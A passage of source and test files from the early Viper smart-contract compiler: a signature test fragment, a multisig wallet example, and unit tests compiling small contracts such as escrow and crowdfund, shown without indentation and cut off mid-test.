recipient = "0x776ba14735ff84789320718cf0aa43e91f7a8ce1"
raw_sigs = [
"<KEY>",
"0xc84fe5d2a600e033930e0cf73f26e78f4c65b134f9c9992f60f08ce0863abdbe0548a6e8aa2d952659f29c67106b59fdfcd64d67df03c1df620c70c85578ae701b"
]
sigs = [(utils.big_endian_to_int(x[64:]), utils.big_endian_to_int(x[:32]), utils.big_endian_to_int(x[32:64])) for x in
map(lambda z: utils.decode_hex(z[2:]), raw_sigs)]
h = utils.sha3(utils.encode_int32(0) + b'\x00' * 12 + utils.decode_hex(recipient[2:]) + utils.encode_int32(25) + b'')
h2 = utils.sha3(b"\x19Ethereum Signed Message:\n32" + h)
assert '0x'+utils.encode_hex(utils.sha3(utils.ecrecover_to_pub(h2, sigs[0][0], sigs[0][1], sigs[0][2]))[12:]) == accounts[0]
assert '0x'+utils.encode_hex(utils.sha3(utils.ecrecover_to_pub(h2, sigs[1][0], sigs[1][1], sigs[1][2]))[12:]) == accounts[1]
x2 = c.contract(open('wallet.v.py').read(), args=[accounts + [t.a3, zero_address, zero_address], 2], language='viper')
c.tx(sender=t.k1, to=x2.address, value=10**17)
assert x2.approve(0, recipient, 25, "", sigs + [[0, 0, 0]] * 3)
print("Javascript signature tests passed")
```
#### File: examples/wallet/wallet.v.py
```python
addrs: address[5]
threshold: num
seq: num
def __init__(_addrs: address[5], _threshold: num):
for i in range(5):
if _addrs[i]:
self.addrs[i] = _addrs[i]
self.threshold = _threshold
def approve(_seq: num, to: address, value: wei_value, data: bytes <= 4096, sigdata: num256[3][5]) -> bytes <= 4096:
approvals = 0
h = sha3(concat(as_bytes32(_seq), as_bytes32(to), as_bytes32(value), data))
h2 = sha3(concat("\x19Ethereum Signed Message:\n32", h))
assert self.seq == _seq
for i in range(5):
if sigdata[i][0]:
assert ecrecover(h2, sigdata[i][0], sigdata[i][1], sigdata[i][2]) == self.addrs[i]
approvals += 1
assert approvals >= self.threshold
self.seq += 1
return raw_call(to, data, outsize=4096, gas=3000000, value=value)
```
#### File: viper/tests/test_parser.py
```python
import pytest
from .setup_transaction_tests import chain as s, tester as t, ethereum_utils as u, check_gas, \
get_contract_with_gas_estimation, get_contract
def test_null_code():
null_code = """
def foo():
pass
"""
c = get_contract_with_gas_estimation(null_code)
c.foo()
print('Successfully executed a null function')
def test_basic_code():
basic_code = """
def foo(x: num) -> num:
return x * 2
"""
c = get_contract_with_gas_estimation(basic_code)
assert c.foo(9) == 18
print('Passed basic code test')
def test_basic_repeater():
basic_repeater = """
def repeat(z: num) -> num:
x = 0
for i in range(6):
x = x + z
return(x)
"""
c = get_contract_with_gas_estimation(basic_repeater)
assert c.repeat(9) == 54
print('Passed basic repeater test')
def test_more_complex_repeater():
more_complex_repeater = """
def repeat() -> num:
out = 0
for i in range(6):
out = out * 10
for j in range(4):
out = out + j
return(out)
"""
c = get_contract_with_gas_estimation(more_complex_repeater)
assert c.repeat() == 666666
print('Passed complex repeater test')
def test_offset_repeater():
offset_repeater = """
def sum() -> num:
out = 0
for i in range(80, 121):
out = out + i
return(out)
"""
c = get_contract_with_gas_estimation(offset_repeater)
assert c.sum() == 4100
print('Passed repeater with offset test')
def test_offset_repeater_2():
offset_repeater_2 = """
def sum(frm: num, to: num) -> num:
out = 0
for i in range(frm, frm + 101):
if i == to:
break
out = out + i
return(out)
"""
c = get_contract_with_gas_estimation(offset_repeater_2)
assert c.sum(100, 99999) == 15150
assert c.sum(70, 131) == 6100
print('Passed more complex repeater with offset test')
def test_array_accessor():
array_accessor = """
def test_array(x: num, y: num, z: num, w: num) -> num:
a: num[4]
a[0] = x
a[1] = y
a[2] = z
a[3] = w
return a[0] * 1000 + a[1] * 100 + a[2] * 10 + a[3]
"""
c = get_contract_with_gas_estimation(array_accessor)
assert c.test_array(2, 7, 1, 8) == 2718
print('Passed basic array accessor test')
def test_two_d_array_accessor():
two_d_array_accessor = """
def test_array(x: num, y: num, z: num, w: num) -> num:
a: num[2][2]
a[0][0] = x
a[0][1] = y
a[1][0] = z
a[1][1] = w
return a[0][0] * 1000 + a[0][1] * 100 + a[1][0] * 10 + a[1][1]
"""
c = get_contract_with_gas_estimation(two_d_array_accessor)
assert c.test_array(2, 7, 1, 8) == 2718
print('Passed complex array accessor test')
def test_digit_reverser():
digit_reverser = """
def reverse_digits(x: num) -> num:
dig: num[6]
z = x
for i in range(6):
dig[i] = z % 10
z = z / 10
o = 0
for i in range(6):
o = o * 10 + dig[i]
return o
"""
c = get_contract_with_gas_estimation(digit_reverser)
assert c.reverse_digits(123456) == 654321
print('Passed digit reverser test')
def test_state_accessor():
state_accessor = """
y: num[num]
def oo():
self.y[3] = 5
def foo() -> num:
return self.y[3]
"""
c = get_contract_with_gas_estimation(state_accessor)
c.oo()
assert c.foo() == 5
print('Passed basic state accessor test')
def test_arbitration_code():
arbitration_code = """
buyer: address
seller: address
arbitrator: address
def setup(_seller: address, _arbitrator: address):
if not self.buyer:
self.buyer = msg.sender
self.seller = _seller
self.arbitrator = _arbitrator
def finalize():
assert msg.sender == self.buyer or msg.sender == self.arbitrator
send(self.seller, self.balance)
def refund():
assert msg.sender == self.seller or msg.sender == self.arbitrator
send(self.buyer, self.balance)
"""
c = get_contract_with_gas_estimation(arbitration_code, value=1)
c.setup(t.a1, t.a2, sender=t.k0)
try:
c.finalize(sender=t.k1)
success = True
except:
success = False
assert not success
c.finalize(sender=t.k0)
print('Passed escrow test')
def test_arbitration_code_with_init():
arbitration_code_with_init = """
buyer: address
seller: address
arbitrator: address
@payable
def __init__(_seller: address, _arbitrator: address):
if not self.buyer:
self.buyer = msg.sender
self.seller = _seller
self.arbitrator = _arbitrator
def finalize():
assert msg.sender == self.buyer or msg.sender == self.arbitrator
send(self.seller, self.balance)
def refund():
assert msg.sender == self.seller or msg.sender == self.arbitrator
send(self.buyer, self.balance)
"""
c = get_contract_with_gas_estimation(arbitration_code_with_init, args=[t.a1, t.a2], sender=t.k0, value=1)
try:
c.finalize(sender=t.k1)
success = True
except t.TransactionFailed:
success = False
assert not success
c.finalize(sender=t.k0)
print('Passed escrow test with initializer')
def test_send():
send_test = """
def foo():
send(msg.sender, self.balance+1)
def fop():
send(msg.sender, 10)
"""
c = s.contract(send_test, language='viper', value=10)
with pytest.raises(t.TransactionFailed):
c.foo()
c.fop()
with pytest.raises(t.TransactionFailed):
c.fop()
def test_decimal_test():
decimal_test = """
def foo() -> num:
return(floor(999.0))
def fop() -> num:
return(floor(333.0 + 666.0))
def foq() -> num:
return(floor(1332.1 - 333.1))
def bar() -> num:
return(floor(27.0 * 37.0))
def baz() -> num:
x = 27.0
return(floor(x * 37.0))
def baffle() -> num:
return(floor(27.0 * 37))
def mok() -> num:
return(floor(999999.0 / 7.0 / 11.0 / 13.0))
def mol() -> num:
return(floor(499.5 / 0.5))
def mom() -> num:
return(floor(1498.5 / 1.5))
def mon() -> num:
return(floor(2997.0 / 3))
def moo() -> num:
return(floor(2997 / 3.0))
def foom() -> num:
return(floor(1999.0 % 1000.0))
def foon() -> num:
return(floor(1999.0 % 1000))
def foop() -> num:
return(floor(1999 % 1000.0))
"""
c = get_contract(decimal_test)
pre_txs = len(s.head_state.receipts)
assert c.foo() == 999
assert c.fop() == 999
assert c.foq() == 999
assert c.bar() == 999
assert c.baz() == 999
assert c.baffle() == 999
assert c.mok() == 999
assert c.mol() == 999
assert c.mom() == 999
assert c.mon() == 999
assert c.moo() == 999
assert c.foom() == 999
assert c.foon() == 999
assert c.foop() == 999
post_txs = len(s.head_state.receipts)
print('Passed basic addition, subtraction and multiplication tests')
check_gas(decimal_test, num_txs=(post_txs - pre_txs))
def test_harder_decimal_test():
harder_decimal_test = """
def phooey(inp: decimal) -> decimal:
x = 10000.0
for i in range(4):
x = x * inp
return x
def arg(inp: decimal) -> decimal:
return inp
def garg() -> decimal:
x = 4.5
x *= 1.5
return x
def harg() -> decimal:
x = 4.5
x *= 2
return x
def iarg() -> wei_value:
x = as_wei_value(7, wei)
x *= 2
return x
"""
c = get_contract(harder_decimal_test)
assert c.phooey(1.2) == 20736.0
assert c.phooey(-1.2) == 20736.0
assert c.arg(-3.7) == -3.7
assert c.arg(3.7) == 3.7
assert c.garg() == 6.75
assert c.harg() == 9.0
assert c.iarg() == 14
print('Passed fractional multiplication test')
def test_break_test():
break_test = """
def log(n: num) -> num:
c = n * 1.0
output = 0
for i in range(400):
c = c / 1.2589
if c < 1.0:
output = i
break
return output
"""
c = get_contract_with_gas_estimation(break_test)
assert c.log(1) == 0
assert c.log(2) == 3
assert c.log(10) == 10
assert c.log(200) == 23
print('Passed for-loop break test')
def test_break_test_2():
break_test_2 = """
def log(n: num) -> num:
c = n * 1.0
output = 0
for i in range(40):
if c < 10:
output = i * 10
break
c = c / 10
for i in range(10):
c = c / 1.2589
if c < 1.0:
output = output + i
break
return output
"""
c = get_contract_with_gas_estimation(break_test_2)
assert c.log(1) == 0
assert c.log(2) == 3
assert c.log(10) == 10
assert c.log(200) == 23
assert c.log(4000000) == 66
print('Passed for-loop break test 2')
def test_augassign_test():
augassign_test = """
def augadd(x: num, y: num) -> num:
z = x
z += y
return z
def augmul(x: num, y: num) -> num:
z = x
z *= y
return z
def augsub(x: num, y: num) -> num:
z = x
z -= y
return z
def augdiv(x: num, y: num) -> num:
z = x
z /= y
return z
def augmod(x: num, y: num) -> num:
z = x
z %= y
return z
"""
c = get_contract(augassign_test)
assert c.augadd(5, 12) == 17
assert c.augmul(5, 12) == 60
assert c.augsub(5, 12) == -7
assert c.augdiv(5, 12) == 0
assert c.augmod(5, 12) == 5
print('Passed aug-assignment test')
def test_break_test_3():
break_test_3 = """
def log(n: num) -> num:
c = decimal(n)
output = 0
for i in range(40):
if c < 10:
output = i * 10
break
c /= 10
for i in range(10):
c /= 1.2589
if c < 1:
output = output + i
break
return output
"""
c = get_contract_with_gas_estimation(break_test_3)
assert c.log(1) == 0
assert c.log(2) == 3
assert c.log(10) == 10
assert c.log(200) == 23
assert c.log(4000000) == 66
print('Passed aug-assignment break composite test')
def test_init_argument_test():
init_argument_test = """
moose: num
def __init__(_moose: num):
self.moose = _moose
def returnMoose() -> num:
return self.moose
"""
c = get_contract_with_gas_estimation(init_argument_test, args=[5])
assert c.returnMoose() == 5
print('Passed init argument test')
def test_constructor_advanced_code():
constructor_advanced_code = """
twox: num
def __init__(x: num):
self.twox = x * 2
def get_twox() -> num:
return self.twox
"""
c = get_contract_with_gas_estimation(constructor_advanced_code, args=[5])
assert c.get_twox() == 10
def test_constructor_advanced_code2():
constructor_advanced_code2 = """
comb: num
def __init__(x: num[2], y: bytes <= 3, z: num):
self.comb = x[0] * 1000 + x[1] * 100 + len(y) * 10 + z
def get_comb() -> num:
return self.comb
"""
c = get_contract_with_gas_estimation(constructor_advanced_code2, args=[[5,7], "dog", 8])
assert c.get_comb() == 5738
print("Passed advanced init argument tests")
def test_permanent_variables_test():
permanent_variables_test = """
var: {a: num, b: num}
def __init__(a: num, b: num):
self.var.a = a
self.var.b = b
def returnMoose() -> num:
return self.var.a * 10 + self.var.b
"""
c = get_contract_with_gas_estimation(permanent_variables_test, args=[5, 7])
assert c.returnMoose() == 57
print('Passed init argument and variable member test')
def test_crowdfund():
crowdfund = """
funders: {sender: address, value: wei_value}[num]
nextFunderIndex: num
beneficiary: address
deadline: timestamp
goal: wei_value
refundIndex: num
timelimit: timedelta
def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta):
self.beneficiary = _beneficiary
self.deadline = block.timestamp + _timelimit
self.timelimit = _timelimit
self.goal = _goal
@payable
def participate():
assert block.timestamp < self.deadline
nfi = self.nextFunderIndex
self.funders[nfi].sender = msg.sender
self.funders[nfi].value = msg.value
self.nextFunderIndex = nfi + 1
@constant
def expired() -> bool:
return block.timestamp >= self.deadline
@constant
def timestamp() -> timestamp:
return block.timestamp
@constant
def deadline() -> timestamp:
return self.deadline
@constant
def timelimit() -> timedelta:
return self.timelimit
@constant
def reached() -> bool:
return self.balance >= self.goal
def finalize():
assert block.timestamp >= self.deadline and self.balance >= self.goal
selfdestruct(self.beneficiary)
def refund():
ind = self.refundIndex
for i in range(ind, ind + 30):
if i >= self.nextFunderIndex:
self.refundIndex = self.nextFunderIndex
return
send(self.funders[i].sender, self.funders[i].value)
self.funders[i].sender = 0x0000000000000000000000000000000000000000
self.funders[i].value = 0
self.refundIndex = ind + 30
"""
c = get_contract(crowdfund, args=[t.a1, 50, 600])
c.participate(value=5)
assert c.timelimit() == 600
assert c.deadline() - c.timestamp() == 600
assert not c.expired()
assert not c.reached()
c.participate(value=49)
assert c.reached()
pre_bal = s.head_state.get_balance(t.a1)
s.head_state.timestamp += 1000
assert c.expired()
c.finalize()
post_bal = s.head_state.get_balance(t.a1)
assert post_bal - pre_bal == 54
c = get_contract(crowdfund, args=[t.a1, 50, 600])
c.participate(value=1, sender=t.k3)
c.participate(value=2, sender=t.k4)
c.participate(value=3, sender=t.k5)
c.participate(value=4, sender=t.k6)
s.head_state.timestamp += 1000
assert c.expired()
assert not c.reached()
pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
c.refund()
post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4]
print('Passed composite crowdfund test')
def test_comment_test():
comment_test = """
def foo() -> num:
# Returns 3
return 3
"""
c = get_contract_with_gas_estimation(comment_test)
assert c.foo() == 3
print('Passed comment test')
def test_packing_test():
packing_test = """
x: num
y: num[5]
z: {foo: num[3], bar: {a: num, b: num}[2]}
a: num
def foo() -> num:
self.x = 1
self.y[0] = 2
self.y[4] = 4
self.z.foo[0] = 8
self.z.foo[2] = 16
self.z.bar[0].a = 32
self.z.bar[0].b = 64
self.z.bar[1].a = 128
self.z.bar[1].b = 256
self.a = 512
return self.x + self.y[0] + self.y[4] + self.z.foo[0] + self.z.foo[2] + \
self.z.bar[0].a + self.z.bar[0].b + self.z.bar[1].a + self.z.bar[1].b + self.a
def fop() -> num:
_x: num
_y: num[5]
_z: {foo: num[3], bar: {a: num, b: num}[2]}
_a: num
_x = 1
_y[0] = 2
_y[4] = 4
_z.foo[0] = 8
_z.foo[2] = 16
_z.bar[0].a = 32
_z.bar[0].b = 64
_z.bar[1].a = 128
_z.bar[1].b = 256
_a = 512
return _x + _y[0] + _y[4] + _z.foo[0] + _z.foo[2] + \
_z.bar[0].a + _z.bar[0].b + _z.bar[1].a + _z.bar[1].b + _a
"""
c = get_contract_with_gas_estimation(packing_test)
assert c.foo() == 1023, c.foo()
assert c.fop() == 1023, c.fop()
print('Passed packing test')
def test_multi_setter_test():
multi_setter_test = """
foo: num[3]
bar: num[3][3]
def foo() -> num:
self.foo = [1, 2, 3]
return(self.foo[0] + self.foo[1] * 10 + self.foo[2] * 100)
def fop() -> num:
self.bar[0] = [1, 2, 3]
self.bar[1] = [4, 5, 6]
return self.bar[0][0] + self.bar[0][1] * 10 + self.bar[0][2] * 100 + \
self.bar[1][0] * 1000 + self.bar[1][1] * 10000 + self.bar[1][2] * 100000
def goo() -> num:
goo: num[3]
goo = [1, 2, 3]
return(goo[0] + goo[1] * 10 + goo[2] * 100)
def gop() -> num: # Following a standard naming scheme; nothing to do with the US republican party
gar: num[3][3]
gar[0] = [1, 2, 3]
gar[1] = [4, 5, 6]
return gar[0][0] + gar[0][1] * 10 + gar[0][2] * 100 + \
gar[1][0] * 1000 + gar[1][1] * 10000 + gar[1][2] * 100000
def hoo() -> num:
self.foo = None
return(self.foo[0] + self.foo[1] * 10 + self.foo[2] * 100)
def hop() -> num:
self.bar[1] = None
return self.bar[0][0] + self.bar[0][1] * 10 + self.bar[0][2] * 100 + \
self.bar[1][0] * 1000 + self.bar[1][1] * 10000 + self.bar[1][2] * 100000
def joo() -> num:
goo: num[3]
goo = [1, 2, 3]
goo = None
return(goo[0] + goo[1] * 10 + goo[2] * 100)
def jop() -> num:
gar: num[3][3]
gar[0] = [1, 2, 3]
gar[1] = [4, 5, 6]
gar[1] = None
return gar[0][0] + gar[0][1] * 10 + gar[0][2] * 100 + \
gar[1][0] * 1000 + gar[1][1] * 10000 + gar[1][2] * 100000
"""
c = get_contract(multi_setter_test)
assert c.foo() == 321
assert c.fop() == 654321
assert c.goo() == 321
assert c.gop() == 654321
assert c.hoo() == 0
assert c.hop() == 321
assert c.joo() == 0
assert c.jop() == 321
print('Passed multi-setter literal test')
def test_multi_setter_struct_test():
multi_setter_struct_test = """
foo: {foo: num, bar: num}[3]
z: {foo: num[3], bar: {a: num, b: num}[2]}[2]
def foo() -> num:
self.foo[0] = {foo: 1, bar: 2}
self.foo[1] = {foo: 3, bar: 4}
self.foo[2] = {foo: 5, bar: 6}
return self.foo[0].foo + self.foo[0].bar * 10 + self.foo[1].foo * 100 + \
self.foo[1].bar * 1000 + self.foo[2].foo * 10000 + self.foo[2].bar * 100000
def fop() -> num:
self.z = [{foo: [1, 2, 3], bar: [{a: 4, b: 5}, {a: 2, b: 3}]},
{foo: [6, 7, 8], bar: [{a: 9, b: 1}, {a: 7, b: 8}]}]
return self.z[0].foo[0] + self.z[0].foo[1] * 10 + self.z[0].foo[2] * 100 + \
self.z[0].bar[0].a * 1000 + self.z[0].bar[0].b * 10000 + self.z[0].bar[1].a * 100000 + self.z[0].bar[1].b * 1000000 + \
self.z[1].foo[0] * 10000000 + self.z[1].foo[1] * 100000000 + self.z[1].foo[2] * 1000000000 + \
self.z[1].bar[0].a * 10000000000 + self.z[1].bar[0].b * 100000000000 + \
self.z[1].bar[1].a * 1000000000000 + self.z[1].bar[1].b * 10000000000000
def goo() -> num:
goo: {foo: num, bar: num}[3]
goo[0] = {foo: 1, bar: 2}
goo[1] = {foo: 3, bar: 4}
goo[2] = {foo: 5, bar: 6}
return goo[0].foo + goo[0].bar * 10 + goo[1].foo * 100 + \
goo[1].bar * 1000 + goo[2].foo * 10000 + goo[2].bar * 100000
def gop() -> num:
zed = [{foo: [1, 2, 3], bar: [{a: 4, b: 5}, {a: 2, b: 3}]},
{foo: [6, 7, 8], bar: [{a: 9, b: 1}, {a: 7, b: 8}]}]
return zed[0].foo[0] + zed[0].foo[1] * 10 + zed[0].foo[2] * 100 + \
zed[0].bar[0].a * 1000 + zed[0].bar[0].b * 10000 + zed[0].bar[1].a * 100000 + zed[0].bar[1].b * 1000000 + \
zed[1].foo[0] * 10000000 + zed[1].foo[1] * 100000000 + zed[1].foo[2] * 1000000000 + \
zed[1].bar[0].a * 10000000000 + zed[1].bar[0].b * 100000000000 + \
zed[1].bar[1].a * 1000000000000 + zed[1].bar[1].b * 10000000000000
"""
c = get_contract(multi_setter_struct_test)
assert c.foo() == 654321
assert c.fop() == 87198763254321
assert c.goo() == 654321
assert c.gop() == 87198763254321
print('Passed multi-setter struct test')
def test_type_converter_setter_test():
type_converter_setter_test = """
mom: {a: {c: num}[3], b: num}
non: {a: {c: decimal}[3], b:num}
pop: decimal[2][2]
def foo() -> num:
self.mom = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
self.non = self.mom
return floor(self.non.a[0].c + self.non.a[1].c * 10 + self.non.a[2].c * 100 + self.non.b * 1000)
def goo() -> num:
self.pop = [[1, 2], [3, 4.0]]
return floor(self.pop[0][0] + self.pop[0][1] * 10 + self.pop[1][0] * 100 + self.pop[1][1] * 1000)
"""
c = get_contract(type_converter_setter_test)
assert c.foo() == 4321
assert c.goo() == 4321
print('Passed type-conversion struct test')
def test_composite_setter_test():
composite_setter_test = """
mom: {a: {c: num}[3], b:num}
qoq: {c: num}
def foo() -> num:
self.mom = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
non = {c: 5}
self.mom.a[0] = non
non = {c: 6}
self.mom.a[2] = non
return self.mom.a[0].c + self.mom.a[1].c * 10 + self.mom.a[2].c * 100 + self.mom.b * 1000
def fop() -> num:
popp = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
self.qoq = {c: 5}
popp.a[0] = self.qoq
self.qoq = {c: 6}
popp.a[2] = self.qoq
return popp.a[0].c + popp.a[1].c * 10 + popp.a[2].c * 100 + popp.b * 1000
def foq() -> num:
popp = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
popp.a[0] = None
popp.a[2] = None
return popp.a[0].c + popp.a[1].c * 10 + popp.a[2].c * 100 + popp.b * 1000
"""
c = get_contract(composite_setter_test)
assert c.foo() == 4625
assert c.fop() == 4625
assert c.foq() == 4020
print('Passed composite struct test')
def test_crowdfund2():
crowdfund2 = """
funders: {sender: address, value: wei_value}[num]
nextFunderIndex: num
beneficiary: address
deadline: timestamp
goal: wei_value
refundIndex: num
timelimit: timedelta
def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta):
self.beneficiary = _beneficiary
self.deadline = block.timestamp + _timelimit
self.timelimit = _timelimit
self.goal = _goal
@payable
def participate():
assert block.timestamp < self.deadline
nfi = self.nextFunderIndex
self.funders[nfi] = {sender: msg.sender, value: msg.value}
self.nextFunderIndex = nfi + 1
@constant
def expired() -> bool:
return block.timestamp >= self.deadline
@constant
def timestamp() -> timestamp:
return block.timestamp
@constant
def deadline() -> timestamp:
return self.deadline
@constant
def timelimit() -> timedelta:
return self.timelimit
@constant
def reached() -> bool:
return self.balance >= self.goal
def finalize():
assert block.timestamp >= self.deadline and self.balance >= self.goal
selfdestruct(self.beneficiary)
def refund():
ind = self.refundIndex
for i in range(ind, ind + 30):
if i >= self.nextFunderIndex:
self.refundIndex = self.nextFunderIndex
return
send(self.funders[i].sender, self.funders[i].value)
self.funders[i] = None
self.refundIndex = ind + 30
"""
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=5)
assert c.timelimit() == 600
assert c.deadline() - c.timestamp() == 600
assert not c.expired()
assert not c.reached()
c.participate(value=49)
assert c.reached()
pre_bal = s.head_state.get_balance(t.a1)
s.head_state.timestamp += 1000
assert c.expired()
c.finalize()
post_bal = s.head_state.get_balance(t.a1)
assert post_bal - pre_bal == 54
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=1, sender=t.k3)
c.participate(value=2, sender=t.k4)
c.participate(value=3, sender=t.k5)
c.participate(value=4, sender=t.k6)
s.head_state.timestamp += 1000
assert c.expired()
assert not c.reached()
pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
c.refund()
post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4]
print('Passed second composite crowdfund test')
def test_test_bytes():
test_bytes = """
def foo(x: bytes <= 100) -> bytes <= 100:
return x
"""
c = get_contract(test_bytes)
moo_result = c.foo(b'cow')
assert moo_result == b'cow'
print('Passed basic bytes test')
assert c.foo(b'\x35' * 100) == b'\x35' * 100
print('Passed max-length bytes test')
try:
c.foo(b'\x35' * 101)
assert False
except:
pass
print('Passed input-too-long test')
def test_test_bytes2():
test_bytes2 = """
def foo(x: bytes <= 100) -> bytes <= 100:
y = x
return y
"""
c = get_contract(test_bytes2)
assert c.foo(b'cow') == b'cow'
assert c.foo(b'') == b''
assert c.foo(b'\x35' * 63) == b'\x35' * 63
assert c.foo(b'\x35' * 64) == b'\x35' * 64
assert c.foo(b'\x35' * 65) == b'\x35' * 65
print('Passed string copying test')
def test_test_bytes3():
test_bytes3 = """
x: num
maa: bytes <= 60
y: num
def __init__():
self.x = 27
self.y = 37
def set_maa(inp: bytes <= 60):
self.maa = inp
def set_maa2(inp: bytes <= 60):
ay = inp
self.maa = ay
def get_maa() -> bytes <= 60:
return self.maa
def get_maa2() -> bytes <= 60:
ay = self.maa
return ay
def get_xy() -> num:
return self.x * self.y
"""
c = get_contract(test_bytes3)
c.set_maa(b"pig")
assert c.get_maa() == b"pig"
assert c.get_maa2() == b"pig"
c.set_maa2(b"")
assert c.get_maa() == b""
assert c.get_maa2() == b""
c.set_maa(b"\x44" * 60)
assert c.get_maa() == b"\x44" * 60
assert c.get_maa2() == b"\x44" * 60
c.set_maa2(b"mongoose")
assert c.get_maa() == b"mongoose"
assert c.get_xy() == 999
print('Passed advanced string copying test')
def test_test_bytes4():
test_bytes4 = """
a: bytes <= 60
def foo(inp: bytes <= 60) -> bytes <= 60:
self.a = inp
self.a = None
return self.a
def bar(inp: bytes <= 60) -> bytes <= 60:
b = inp
b = None
return b
"""
c = get_contract(test_bytes4)
assert c.foo() == b"", c.foo()
assert c.bar() == b""
print('Passed string deleting test')
def test_test_bytes5():
test_bytes5 = """
g: {a: bytes <= 50, b: bytes <= 50}
def foo(inp1: bytes <= 40, inp2: bytes <= 45):
self.g = {a: inp1, b: inp2}
def check1() -> bytes <= 50:
return self.g.a
def check2() -> bytes <= 50:
return self.g.b
def bar(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
h = {a: inp1, b: inp2}
return h.a
def bat(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
h = {a: inp1, b: inp2}
return h.b
def quz(inp1: bytes <= 40, inp2: bytes <= 45):
h = {a: inp1, b: inp2}
self.g = h
"""
c = get_contract(test_bytes5)
c.foo(b"cow", b"horse")
assert c.check1() == b"cow"
assert c.check2() == b"horse"
assert c.bar(b"pig", b"moose") == b"pig"
assert c.bat(b"pig", b"moose") == b"moose"
c.quz(b"badminton", b"fluffysheep")
assert c.check1() == b"badminton"
assert c.check2() == b"fluffysheep"
print('Passed string struct test')
def test_test_slice():
test_slice = """
def foo(inp1: bytes <= 10) -> bytes <= 3:
x = 5
s = slice(inp1, start=3, len=3)
y = 7
return s
def bar(inp1: bytes <= 10) -> num:
x = 5
s = slice(inp1, start=3, len=3)
y = 7
return x * y
"""
c = get_contract(test_slice)
x = c.foo(b"badminton")
assert x == b"min", x
assert c.bar(b"badminton") == 35
print('Passed slice test')
def test_test_slice2():
test_slice2 = """
def slice_tower_test(inp1: bytes <= 50) -> bytes <= 50:
inp = inp1
for i in range(1, 11):
inp = slice(inp, start=1, len=30 - i * 2)
return inp
"""
c = get_contract_with_gas_estimation(test_slice2)
x = c.slice_tower_test(b"abcdefghijklmnopqrstuvwxyz1234")
assert x == b"klmnopqrst", x
print('Passed advanced slice test')
def test_test_slice3():
test_slice3 = """
x: num
s: bytes <= 50
y: num
def foo(inp1: bytes <= 50) -> bytes <= 50:
self.x = 5
self.s = slice(inp1, start=3, len=3)
self.y = 7
return self.s
def bar(inp1: bytes <= 50) -> num:
self.x = 5
self.s = slice(inp1, start=3, len=3)
self.y = 7
return self.x * self.y
"""
c = get_contract(test_slice3)
x = c.foo(b"badminton")
assert x == b"min", x
assert c.bar(b"badminton") == 35
print('Passed storage slice test')
def test_test_slice4():
test_slice4 = """
def foo(inp: bytes <= 10, start: num, len: num) -> bytes <= 10:
return slice(inp, start=start, len=len)
"""
c = get_contract(test_slice4)
assert c.foo(b"badminton", 3, 3) == b"min"
assert c.foo(b"badminton", 0, 9) == b"badminton"
assert c.foo(b"badminton", 1, 8) == b"adminton"
assert c.foo(b"badminton", 1, 7) == b"adminto"
assert c.foo(b"badminton", 1, 0) == b""
assert c.foo(b"badminton", 9, 0) == b""
try:
c.foo(b"badminton", 0, 10)
assert False
except:
pass
try:
c.foo(b"badminton", 1, 9)
assert False
except:
pass
try:
c.foo(b"badminton", 9, 1)
assert False
except:
pass
try:
c.foo(b"badminton", 10, 0)
assert False
except:
pass
print('Passed slice edge case test')
def test_test_length():
test_length = """
y: bytes <= 10
def foo(inp: bytes <= 10) -> num:
x = slice(inp, start=1, len=5)
self.y = slice(inp, start=2, len=4)
return len(inp) * 100 + len(x) * 10 + len(self.y)
"""
c = get_contract(test_length)
assert c.foo(b"badminton") == 954, c.foo(b"badminton")
print('Passed length test')
def test_test_concat():
test_concat = """
def foo2(input1: bytes <= 50, input2: bytes <= 50) -> bytes <= 1000:
return concat(input1, input2)
def foo3(input1: bytes <= 50, input2: bytes <= 50, input3: bytes <= 50) -> bytes <= 1000:
return concat(input1, input2, input3)
"""
c = get_contract(test_concat)
assert c.foo2(b"h", b"orse") == b"horse"
assert c.foo2(b"h", b"") == b"h"
assert c.foo2(b"", b"") == b""
assert c.foo2(b"", b"orse") == b"orse"
assert c.foo3(b"Buffalo", b" ", b"buffalo") == b"Buffalo buffalo"
assert c.foo2(b"\x36", b"\x35" * 32) == b"\x36" + b"\x35" * 32
assert c.foo2(b"\x36" * 48, b"\x35" * 32) == b"\x36" * 48 + b"\x35" * 32
assert c.foo3(b"horses" * 4, b"mice" * 7, b"crows" * 10) == b"horses" * 4 + b"mice" * 7 + b"crows" * 10
print('Passed simple concat test')
def test_test_concat2():
test_concat2 = """
def foo(inp: bytes <= 50) -> bytes <= 1000:
x = inp
return concat(x, inp, x, inp, x, inp, x, inp, x, inp)
"""
c = get_contract(test_concat2)
assert c.foo(b"horse" * 9 + b"viper") == (b"horse" * 9 + b"viper") * 10
print('Passed second concat test')
def test_crazy_concat_code():
crazy_concat_code = """
y: bytes <= 10
def krazykonkat(z: bytes <= 10) -> bytes <= 25:
x = "cow"
self.y = "horse"
return concat(x, " ", self.y, " ", z)
"""
c = get_contract(crazy_concat_code)
assert c.krazykonkat(b"moose") == b'cow horse moose'
print('Passed third concat test')
def test_string_literal_code():
string_literal_code = """
def foo() -> bytes <= 5:
return "horse"
def bar() -> bytes <= 10:
return concat("b", "a", "d", "m", "i", "", "nton")
def baz() -> bytes <= 40:
return concat("0123456789012345678901234567890", "12")
def baz2() -> bytes <= 40:
return concat("01234567890123456789012345678901", "12")
def baz3() -> bytes <= 40:
return concat("0123456789012345678901234567890", "1")
def baz4() -> bytes <= 100:
return concat("01234567890123456789012345678901234567890123456789",
"01234567890123456789012345678901234567890123456789")
